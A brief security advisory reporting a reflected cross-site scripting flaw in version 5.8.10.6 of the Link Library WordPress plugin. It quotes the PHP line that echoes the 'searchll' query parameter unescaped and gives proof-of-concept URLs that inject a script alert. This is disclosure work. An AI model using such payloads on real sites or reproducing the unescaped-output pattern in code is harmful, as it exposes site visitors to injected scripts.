Link Library 5.8.10.6 Reflected XSS

Homepage:

https://wordpress.org/plugins/link-library/

Description:

$_GET['searchll'] is not escaped.

File: link-library\render-link-library-sc.php

if ( 'search' == $mode ) {
    $output .= '<div class="resulttitle">' . __('Search Results for', 'link-library') . ' "' . stripslashes( $_GET['searchll'] ) . '"</div>';
}

Proof of Concept:

XSS will be visible on page with [link-library settings=1] tag.

http://wordpress_install/page_with_tag/?searchll=word_that_must_found_some_link <script>alert("XSS");</script>

XSS will be visible only if search function return something.

So we can use popular letter (ā€œaā€ or ā€œeā€) and after space put XSS. For example:

http://wordpress_install/page_with_tag/?searchll=a <script>alert("XSS");</script>

Timeline: